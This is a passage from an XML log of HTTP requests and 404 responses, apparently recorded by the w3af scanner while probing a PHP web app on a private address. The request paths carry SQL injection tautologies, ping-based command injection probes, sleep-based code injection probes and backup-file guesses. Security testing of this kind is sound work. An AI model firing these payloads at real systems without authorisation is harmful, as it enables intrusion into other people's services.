                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%270 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%270'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="389">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/Cl4j5xwm HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="389">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about Cl4j5xwm has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='Cl4j5xwm'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="392">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="392">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about sleep%283%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='sleep%283%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="395">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="395">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="404">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/68%22+OR+%2268%22%3D%2268 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="404">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 68%22+OR+%2268%22%3D%2268 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='68%22+OR+%2268%22%3D%2268'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="418">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/68%22+AND+%2268%22%3D%2269 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="418">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 68%22+AND+%2268%22%3D%2269 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='68%22+AND+%2268%22%3D%2269'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="427">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96%27+OR+%2796%27%3D%2796 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="427">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96%27+OR+%2796%27%3D%2796 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96%27+OR+%2796%27%3D%2796'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="435">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96%27+AND+%2796%27%3D%2797 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="435">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96%27+AND+%2796%27%3D%2797 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96%27+AND+%2796%27%3D%2797'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="438">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="438">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="439">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="439">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%220 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%220'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="440">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="440">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3C%21-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3C%21--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="441">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="441">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="442">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="442">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="443">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="443">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="444">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="444">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about cake~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='cake~'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="445">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="445">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="446">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="446">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="447">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="447">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="448">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="448">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="450">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="450">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="451">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="451">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="452">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="452">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="454">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="454">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="455">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="455">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="456">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="456">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
